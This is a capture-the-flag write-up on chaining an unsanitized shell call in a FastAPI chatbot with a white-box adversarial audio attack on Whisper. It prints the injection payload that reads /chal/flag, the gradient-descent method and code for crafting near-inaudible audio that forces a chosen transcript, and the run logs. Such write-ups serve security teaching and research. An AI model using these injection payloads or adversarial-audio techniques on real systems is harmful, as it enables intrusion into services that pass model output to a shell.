Writeup – bi0s CTF 2025: dont_whisper

1. Challenge Overview

> many say that neural networks are non deterministic and generating mappings between input and output is non TRIVIAL

- Name: dont_whisper

- Category: Misc

- Points: 991/1000

- Solves: 5

- Author: w1z

- Challenge Files: dont_whisper.zip

- Flag Format: bi0sctf{…}

The challenge provides a FastAPI-based service that lets users interact with a chatbot via text and audio. Audio uploads are transcribed by a patched version of OpenAI’s Whisper ASR (model tiny.en, version v20231117) before the transcript is passed to the chatbot. The patch simplifies the exploit, as explained later. Our goal was to find and exploit vulnerabilities in the provided system to read the flag placed at /chal/flag.

2. Initial Reconnaissance

We began by examining the provided source code:

```
dont_whisper/
├── src/
│   ├── chatapp/
│   │   ├── app.py          # FastAPI service
│   │   └── templates/...   # UI
│   ├── chatbot.py          # simple keyword-based responses
│   └── whisper/            # patched Whisper v20231117 sources
└── Dockerfile, configs
```

In src/chatapp/app.py, two endpoints stand out:

- POST /api/chat rejects any input containing dangerous characters such as ', ; and &. It then safely runs the chatbot with an argument list, without a shell:

```python
def sanitize_input(text: str) -> str:
    """Sanitize user input to prevent command injection."""
    # Block common dangerous characters
    dangerous_chars = ["'", ";", "&", "|", "`", "$", "\n", "\r"]
    if any(char in text for char in dangerous_chars):
        raise HTTPException(status_code=400, detail="Invalid input detected.")
    return text.strip()

@app.post("/api/chat")
async def chat_response(user_text: str = Form(...)):

    sanitized_text = sanitize_input(user_text)
    [...]
    result = subprocess.run(
        ['python3', 'chatbot.py', sanitized_text],
        stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL,
        text=True  # ensures output is captured as a string instead of bytes
    )
    [...]
```

- POST /api/audio-chat performs no sanitization of the transcript:

```python
@app.post("/api/audio-chat")
async def audio_response(audio: UploadFile = File(...)):
    [...]
    result = subprocess.run(
        [
            "python3", "whisper.py", "--model", "tiny.en", audio_file_path,
            "--language", "English", "--best_of", "5", "--beam_size", "None"
        ],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        text=True
    )
    [...]
    transcription = result.stdout.strip()
    [...]
    chatbot_proc = await asyncio.create_subprocess_shell(
        f"python3 chatbot.py '{transcription}'",
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.STDOUT
    )
    [...]
```

Because asyncio.create_subprocess_shell hands this f-string to a shell, any single quote in the transcription closes the quoted argument early, opening the door to command injection.
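To see how the shell splits that command line, we can approximate POSIX shell tokenization with Python's shlex module in punctuation-aware mode. This is only an approximation of /bin/sh (no expansions, no operator semantics), and the helper name shell_tokens is our own:

```python
import shlex

def shell_tokens(transcription: str) -> list[str]:
    """Approximate how /bin/sh tokenizes the command built in /api/audio-chat."""
    command = f"python3 chatbot.py '{transcription}'"
    # punctuation_chars=True splits out ';', '&', '|' etc.; '#' starts a comment
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lexer)

# A benign transcription stays a single argument to chatbot.py
print(shell_tokens("hello there"))
# → ['python3', 'chatbot.py', 'hello there']

# An apostrophe closes the quote early, ';' starts a new command, '#' hides the rest
print(shell_tokens("foo'; cat /chal/flag; #"))
# → ['python3', 'chatbot.py', 'foo', ';', 'cat', '/chal/flag', ';']
```

Even an ordinary contraction is enough: the apostrophe in "I'm" closes the quote just as well as a bare ' would.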

3. Crafting the Injection Payload

By closing the quote, injecting our command, and using a shell comment (#), we can execute arbitrary commands. For example:

```
payload = foo'; cat /chal/flag; #
# Execution becomes:
python3 chatbot.py 'foo'; cat /chal/flag; #'
# This prints the flag and ignores the trailing `'`
```

Since the service returns the output of this command (the chatbot's stdout) to the client, we can read the flag directly, provided we can actually get the injection into the transcription.

Now our challenge becomes: How can we generate an audio file that Whisper would reliably transcribe into our desired payload?

Well, what if we just say the injection out loud? Let’s try using text-to-speech (TTS) to speak the payload and transcribe the result!

We create a TTS audio file that says `'; cat chal/flag; #` and transcribe it with Whisper:

```
Single quote semicolon cat chow slash flag sem
```

Oh no! Whisper transcribes the spoken words, but not the special characters we want. This makes sense: it is trained on human speech, and people rarely spell out command-line injections when they talk.

We will have to take a more advanced approach.

4. Understanding Whisper and ASR Models (High-Level Primer)

Modern ASR systems like Whisper transform raw audio into text in three main stages. The most important property for us is that the entire pipeline is differentiable, which lets us optimize our input directly with gradients when we craft a malicious file later on. If you are interested, here is a quick overview of how Whisper transcribes audio to text:

- Feature Extraction → Log-Mel Spectrogram: The continuous waveform is first segmented into short, overlapping frames. Each frame is converted via a Short-Time Fourier Transform (STFT) into a power spectrum, then re-mapped onto the mel scale (which approximates human pitch perception) and finally converted to log amplitude. The result is an 80-band time–frequency “image” that highlights the perceptually relevant spectral features of speech. See: Spectrogram
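As a rough illustration of this stage, here is a NumPy sketch of a Whisper-style log-Mel front end. The parameters (16 kHz input, 400-sample window, 160-sample hop, 80 mel bands, dropping the last STFT frame, and the final clamp/normalization) follow our reading of Whisper's audio.py. The filterbank is a simple HTK-style triangle bank, which is an assumption on our part: Whisper ships precomputed librosa filters instead. Every step is differentiable almost everywhere, so the same computation written in PyTorch can be backpropagated through:

```python
import numpy as np

SAMPLE_RATE = 16_000  # Whisper expects 16 kHz mono audio
N_FFT = 400           # 25 ms analysis window
HOP = 160             # 10 ms hop between frames
N_MELS = 80           # number of mel bands

def hz_to_mel(f):
    return 2595.0 * np.log10(1.0 + f / 700.0)

def mel_to_hz(m):
    return 700.0 * (10.0 ** (m / 2595.0) - 1.0)

def mel_filterbank(n_mels=N_MELS, n_fft=N_FFT, sr=SAMPLE_RATE):
    """Triangular HTK-style filters (a simplification of Whisper's librosa filters)."""
    fft_freqs = np.linspace(0.0, sr / 2, n_fft // 2 + 1)
    hz_points = mel_to_hz(np.linspace(hz_to_mel(0.0), hz_to_mel(sr / 2), n_mels + 2))
    fb = np.zeros((n_mels, len(fft_freqs)))
    for i in range(n_mels):
        lo, center, hi = hz_points[i], hz_points[i + 1], hz_points[i + 2]
        rising = (fft_freqs - lo) / (center - lo)
        falling = (hi - fft_freqs) / (hi - center)
        fb[i] = np.maximum(0.0, np.minimum(rising, falling))
    return fb

def log_mel_spectrogram(audio):
    # Centered framing with reflect padding, like torch.stft(center=True)
    padded = np.pad(audio, N_FFT // 2, mode="reflect")
    n_frames = 1 + (len(padded) - N_FFT) // HOP
    window = np.hanning(N_FFT + 1)[:-1]  # periodic Hann window
    frames = np.stack([padded[i * HOP : i * HOP + N_FFT] * window for i in range(n_frames)])
    power = np.abs(np.fft.rfft(frames, axis=1)) ** 2  # (frames, 201) power spectrum
    power = power[:-1].T                               # drop last frame -> (201, frames)
    mel = mel_filterbank() @ power                     # (80, frames)
    log_spec = np.log10(np.maximum(mel, 1e-10))
    log_spec = np.maximum(log_spec, log_spec.max() - 8.0)  # cap dynamic range at 80 dB
    return (log_spec + 4.0) / 4.0                          # rescale to a small range

one_second = 0.1 * np.random.default_rng(0).normal(size=SAMPLE_RATE)
print(log_mel_spectrogram(one_second).shape)  # (80, 100): 100 frames per second
```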

After this transformation, the spectrogram is fed into the encoder, which turns it into a sequence of embeddings. In Whisper’s case, this stage is:

- Encoder: Convolution + Transformer
  - Convolutional front-end: 1D convolutions downsample the spectrogram in time and capture local frequency–time patterns (e.g. formant structure).
  - Transformer layers (self-attention + feedforward): build contextual embeddings that capture long-range dependencies.

See: Transformer
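To make the "downsample in time" step concrete, here is a NumPy sketch of a two-layer convolutional front end in the style of Whisper’s encoder. It uses a stride-1 convolution followed by a stride-2 convolution, both with kernel size 3 and padding 1, each followed by GELU. Several details are assumptions. The weights are random stand-ins. The width of 384 is our assumption for tiny.en’s hidden size. We use the tanh approximation of GELU to stay NumPy-only. With these settings, a 30-second window of 3000 mel frames comes out as 1500 positions for the Transformer layers:

```python
import numpy as np

def conv1d(x, weight, bias, stride=1, padding=1):
    """1D convolution. x: (C_in, T), weight: (C_out, C_in, K) -> (C_out, T_out)."""
    _, _, k = weight.shape
    x = np.pad(x, ((0, 0), (padding, padding)))  # zero-pad the time axis
    t_out = (x.shape[1] - k) // stride + 1
    # Index matrix of the K-wide window for each output position: (T_out, K)
    idx = stride * np.arange(t_out)[:, None] + np.arange(k)[None, :]
    windows = x[:, idx]  # (C_in, T_out, K)
    # Contract over input channels and kernel taps -> (T_out, C_out)
    out = np.tensordot(windows.transpose(1, 0, 2), weight, axes=([1, 2], [1, 2]))
    return out.T + bias[:, None]

def gelu(x):
    # tanh approximation of GELU (Whisper itself uses the exact erf form)
    return 0.5 * x * (1.0 + np.tanh(np.sqrt(2.0 / np.pi) * (x + 0.044715 * x ** 3)))

def conv_front_end(mel, d_model=384, seed=0):
    """Random-weight stand-in for the encoder's two convolutions."""
    rng = np.random.default_rng(seed)
    w1 = rng.normal(scale=0.02, size=(d_model, mel.shape[0], 3))
    w2 = rng.normal(scale=0.02, size=(d_model, d_model, 3))
    b1, b2 = np.zeros(d_model), np.zeros(d_model)
    x = gelu(conv1d(mel, w1, b1, stride=1))  # keeps the time resolution
    x = gelu(conv1d(x, w2, b2, stride=2))    # halves the time resolution
    return x

features = conv_front_end(np.zeros((80, 3000)))
print(features.shape)  # (384, 1500)
```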

In the last stage, a decoder maps these embeddings to text:

- Decoder: Autoregressive Token Generation

Given the encoder’s embeddings and any tokens already produced, the decoder predicts the next token’s probabilities over a fixed vocabulary. Standard Whisper employs beam search (exploring multiple high-probability token sequences) and “temperature”-based fallbacks (to avoid repetition and low-confidence outputs), guided by thresholds on compression ratios and log-probabilities.
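The compression-ratio threshold mentioned above works as a cheap repetition detector, because highly repetitive text compresses very well under zlib. Below is a small sketch of that check combined with the log-probability check, as we understand stock Whisper to apply them. The thresholds 2.4 and -1.0 are, to our knowledge, the defaults of the compression_ratio_threshold and logprob_threshold parameters of whisper.transcribe. needs_fallback is our own helper name. The challenge’s patched decoder does not run this logic:

```python
import zlib

def compression_ratio(text: str) -> float:
    # Ratio of raw bytes to zlib-compressed bytes; repetitive text scores high
    data = text.encode("utf-8")
    return len(data) / len(zlib.compress(data))

def needs_fallback(text: str, avg_logprob: float,
                   compression_ratio_threshold: float = 2.4,
                   logprob_threshold: float = -1.0) -> bool:
    """Would stock Whisper retry this segment at a higher temperature?"""
    too_repetitive = compression_ratio(text) > compression_ratio_threshold
    too_unlikely = avg_logprob < logprob_threshold
    return too_repetitive or too_unlikely

print(needs_fallback("Thank you. " * 20, avg_logprob=-0.2))           # True: repetition loop
print(needs_fallback("The quick brown fox jumps.", avg_logprob=-0.3))  # False
```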

It’s important to note that the challenge authors stripped out the beam search and fallback logic. Instead, decoding is limited to a small fixed number of steps (≈12), and each new token is chosen by a simple greedy argmax. This greatly simplifies the search and makes the model easier to attack. It also removes the randomness of temperature-based sampling, so any malicious file we craft produces very consistent transcriptions.

If the code were unchanged, our approach would still work but would require more compute time.
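The patched decoding described above boils down to a loop like the sketch below. It starts from the start-of-transcript prefix and repeatedly appends the argmax of the next-token logits. It stops at end-of-text or after a fixed step budget. The next_token_logits callable and the toy token IDs stand in for the Whisper decoder and are purely illustrative; this is not the challenge’s actual patch:

```python
from typing import Callable, Sequence

def greedy_decode(next_token_logits: Callable[[Sequence[int]], Sequence[float]],
                  prefix: Sequence[int], eot: int, max_steps: int = 12) -> list[int]:
    """Greedy argmax decoding with a hard step budget (no beam search, no sampling)."""
    tokens = list(prefix)
    for _ in range(max_steps):
        logits = next_token_logits(tokens)
        best = max(range(len(logits)), key=logits.__getitem__)  # argmax
        tokens.append(best)
        if best == eot:
            break
    return tokens[len(prefix):]

# Toy "decoder": prefers (last token + 1), capped at 5, which plays the role of EOT
def toy_logits(tokens):
    scores = [0.0] * 6
    scores[min(tokens[-1] + 1, 5)] = 1.0
    return scores

print(greedy_decode(toy_logits, prefix=[0], eot=5))               # [1, 2, 3, 4, 5]
print(greedy_decode(toy_logits, prefix=[0], eot=5, max_steps=3))  # [1, 2, 3]
```

No sampling is involved, so the same input always yields the same tokens. This determinism is what makes a crafted audio file reliable.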

5. White‑Box Adversarial Attack Strategy

Because we have full access to the exact Whisper code and model weights, we’re in a classic white-box setting. This lets us craft inputs by backpropagating gradients all the way to the raw audio samples, an approach pioneered in works like Carlini & Wagner 2018.

Attack Workflow

- Specify the target token sequence: We encode our injection payload (e.g. `foo' ; cat /chal/flag #`) into Whisper’s vocabulary IDs, enclosing it between the special start-of-transcript (SOT) and end-of-text (EOT) tokens.

- Initialize a seed waveform: Start from 5 seconds of small-amplitude Gaussian noise (or innocuous TTS output/music), represented as a PyTorch tensor with requires_grad=True. We use an innocuous-sounding music clip (the seed WAV linked in the addendum) as our seed waveform. Whisper transcribes it as:

```
(upbeat music)
```

- Forward pass (teacher forcing):
  - Compute the log-Mel spectrogram of the current waveform.
  - Run it through Whisper’s encoder to obtain audio embeddings.
  - Feed these embeddings, together with the SOT prefix and the target tokens shifted by one position, into the decoder to produce logits for each next-token prediction.

- Loss calculation: Use the cross-entropy between the decoder’s logits and our target token IDs. This loss quantifies how far the model’s predictions are from our desired phrase.

- Backward pass & waveform update: Backpropagate the loss to compute gradients w.r.t. the waveform. Apply an Adam optimizer step to nudge the audio samples toward a lower loss, then clamp the waveform to stay within valid amplitude bounds (e.g. [-1, 1]).

- Periodic transcription check: Every N iterations, decode the current waveform with our patched “greedy argmax” loop, which mimics the CTF’s 12-token, beamless decoder. We declare success and stop once the transcription contains an apostrophe, then our `; cat /chal/flag` sequence, then a `#` or a trailing `'`.
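The stopping criterion can be written as a small predicate over the decoded text. looks_like_injection below is a hypothetical re-implementation of the conditions in the script’s docstring: an apostrophe, the substring "; cat /chal/flag " with its trailing space, then a # or a trailing apostrophe. We additionally require the apostrophe to come before the command, since that is what closes the shell quote. It is a heuristic and does not fully parse shell quoting:

```python
CMD = "; cat /chal/flag "  # trailing space so '#' starts a new word (a shell comment)

def looks_like_injection(text: str) -> bool:
    """Hypothetical check: does this transcript break out of '...' and run our command?"""
    cmd_pos = text.find(CMD)
    if cmd_pos == -1:
        return False
    # An apostrophe before the command closes the quote opened by chatbot.py '...'
    if "'" not in text[:cmd_pos]:
        return False
    rest = text[cmd_pos + len(CMD):]
    # Either comment out the leftover quote, or end with a quote that pairs with it
    return "#" in rest or text.endswith("'")

print(looks_like_injection("I'm doing research; cat /chal/flag #"))  # True
print(looks_like_injection("(upbeat music)"))                        # False
```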

By iterating this workflow over many gradient-descent steps, we gradually sculpt the seed waveform into one that Whisper reliably transcribes as our injection phrase, even if the model never saw such samples in its training data.
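The whole loop can be illustrated without a GPU or Whisper by swapping the ASR model for a tiny random linear "decoder". Its logits at step t depend on the input vector and on the previous token. This toy stand-in is entirely our own, including the names, the sizes and the hand-derived gradient; it is not the challenge script. It does, however, have the same shape as the real attack. It uses a teacher-forced cross-entropy loss, a gradient with respect to the input, an Adam step, clamping to [-1, 1], and a periodic greedy check. PyTorch autograd would compute the gradient automatically. Here it is derived by hand: for each position, W[t]ᵀ is applied to (softmax - one-hot).

```python
import numpy as np

rng = np.random.default_rng(0)
V, D, T = 20, 256, 6             # toy vocab size, "waveform" length, target length
SOT, EOT = 0, 1                  # toy special tokens
W = rng.normal(size=(T, V, D))   # toy per-position "encoder+decoder" weights
E = rng.normal(size=(V, V))      # toy dependence on the previous token

def step_logits(x, t, prev):
    return W[t] @ x + E[prev]

def greedy_decode(x):
    prev, out = SOT, []
    for t in range(T):
        prev = int(np.argmax(step_logits(x, t, prev)))
        out.append(prev)
    return out

def loss_and_grad(x, target):
    prevs = [SOT] + target[:-1]  # teacher forcing: feed the ground-truth prefix
    loss, grad = 0.0, np.zeros_like(x)
    for t in range(T):
        z = step_logits(x, t, prevs[t])
        p = np.exp(z - z.max())
        p /= p.sum()                 # softmax over the toy vocabulary
        loss -= np.log(p[target[t]])
        p[target[t]] -= 1.0          # d(cross-entropy)/d(logits) = softmax - onehot
        grad += W[t].T @ p           # chain rule back to the input x
    return loss, grad

def attack(target, steps=2000, lr=0.01, check_every=50):
    x = 0.01 * rng.normal(size=D)    # small-amplitude noise seed
    m, v = np.zeros(D), np.zeros(D)
    b1, b2, eps = 0.9, 0.999, 1e-8
    for i in range(1, steps + 1):
        _, g = loss_and_grad(x, target)
        m = b1 * m + (1 - b1) * g    # Adam first moment
        v = b2 * v + (1 - b2) * g * g  # Adam second moment
        x -= lr * (m / (1 - b1 ** i)) / (np.sqrt(v / (1 - b2 ** i)) + eps)
        x = np.clip(x, -1.0, 1.0)    # keep "samples" in the valid amplitude range
        if i % check_every == 0 and greedy_decode(x) == target:
            return x, i              # periodic check: stop once greedy output matches
    return x, steps

target = [5, 9, 3, 12, 7, EOT]       # toy stand-in for the payload's token IDs
x_adv, steps_used = attack(target)
print(steps_used, greedy_decode(x_adv) == target)
```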

6. Attack Implementation

Below is the complete whitebox_adversarial_whisper.py script implementing the attack. Key sections are commented inline.

```python
#!/usr/bin/env python3
"""
whitebox_adversarial_whisper.py

Adversarial audio attack on the patched Whisper-20231117 tiny.en model.
Generates an audio file that, when run through the exact same CLI:

    python3 whisper.py --model tiny.en --language English --best_of 5 --beam_size None exploit.wav

will produce a transcript containing:

    • at least one apostrophe (')
    • the substring "; cat /chal/flag "
    • and either a '#' somewhere after it or a trailing apostrophe.

The attack is white-box: we backpropagate through Whisper's encoder+decoder
(logits) with a teacher-forced cross-entropy loss on the injection command
tokens, and use the model's own greedy argmax decoder (matching the …
```

7. Running the exploit

Now we can run the script to generate our malicious audio file.

You can create a venv with the following packages to run it:

```
pip install openai-whisper==20231117 torchaudio tqdm soundfile
```

We use the innocuous music clip from before as our seed waveform:

```
$ python whitebox_adversarial_whisper.py
[+] Using device: cuda
[+] Starting training for 30000 steps…
step 00010: '<|startoftranscript|><|nospeech|><|endoftext|>'
step 00020: '<|startoftranscript|><|notimestamps|> [MUSIC]<|endoftext|>'
step 00030: '<|startoftranscript|><|notimestamps|> [MUSIC PLAYING]<|endoftext|>'
step 00040: '<|startoftranscript|><|notimestamps|> [MUSIC PLAYING]<|endoftext|>'
step 00050: '<|startoftranscript|><|notimestamps|> [MUSIC PLAYING]<|endoftext|>'
step 00060: '<|startoftranscript|><|notimestamps|> [MUSIC PLAYING]<|endoftext|>'
step 00070: '<|startoftranscript|><|notimestamps|> (upbeat music)<|endoftext|>'
step 00080: '<|startoftranscript|><|notimestamps|> (upbeat music)<|endoftext|>'
step 00090: '<|startoftranscript|><|notimestamps|> (upbeat music)<|endoftext|>'
step 00100: "<|startoftranscript|>I'm doing research; cat /chal/flag #<|endoftext|>"
[+] Injection pattern detected early!
[+] Saved exploit WAV → exploit.wav
[+] Done. Upload to the CTF and get the flag! :)
```

Our approach generates a malicious audio file within 60–100 steps, which takes less than a minute on a single modern GPU. The difference from the original seed file is barely audible (both WAVs are linked in the addendum).
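One common way to quantify how small the change to the seed audio is: compute the signal-to-noise ratio of the seed relative to the added perturbation, in decibels. The sketch below is our own addition, not part of the challenge script. With the real files, you would load both WAVs (for example with soundfile.read, which returns the samples and the sample rate) and pass the sample arrays in. This assumes both files share a sample rate and length:

```python
import numpy as np

def perturbation_snr_db(seed: np.ndarray, adversarial: np.ndarray) -> float:
    """SNR of the seed audio relative to the added perturbation, in dB (higher = quieter change)."""
    seed = np.asarray(seed, dtype=np.float64)
    delta = np.asarray(adversarial, dtype=np.float64) - seed
    noise_power = np.sum(delta ** 2)
    if noise_power == 0.0:
        return float("inf")  # identical signals
    return float(10.0 * np.log10(np.sum(seed ** 2) / noise_power))

# Toy check: a 440 Hz tone plus a perturbation 100x smaller in amplitude
t = np.arange(16_000) / 16_000
tone = 0.5 * np.sin(2 * np.pi * 440 * t)
print(round(perturbation_snr_db(tone, tone * 1.01), 1))  # 40.0
```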

We validate the file with the challenge’s Whisper version:

```
$ python3 whisper.py --model tiny.en --language English --best_of 5 --beam_size None exploit.wav
I'm doing research; cat /chal/flag #
```



Finally, we upload the generated exploit.wav to the FastAPI chatbot app, triggering the command injection!

We got the flag!

bi0sctf{DiD_Y0u_kn0w_NN_c4n_b3_1nv3rt3d-1729}

Addendum

We converted the .wav files to .mp3 for easier web playback.

The conversion destroys our trained payload, so Whisper won’t correctly transcribe the mp3s.

You can get the original wavs here:

Seed WAV file

Maliciously crafted WAV file

References & Further Reading

- Carlini & Wagner, Audio Adversarial Examples (2018): https://arxiv.org/abs/1801.01944

- Whisper ASR: https://github.com/openai/whisper

- Transformer models: https://en.wikipedia.org/wiki/Transformer_(machine_learning_model)

- Log-Mel Spectrograms: https://en.wikipedia.org/wiki/Spectrogram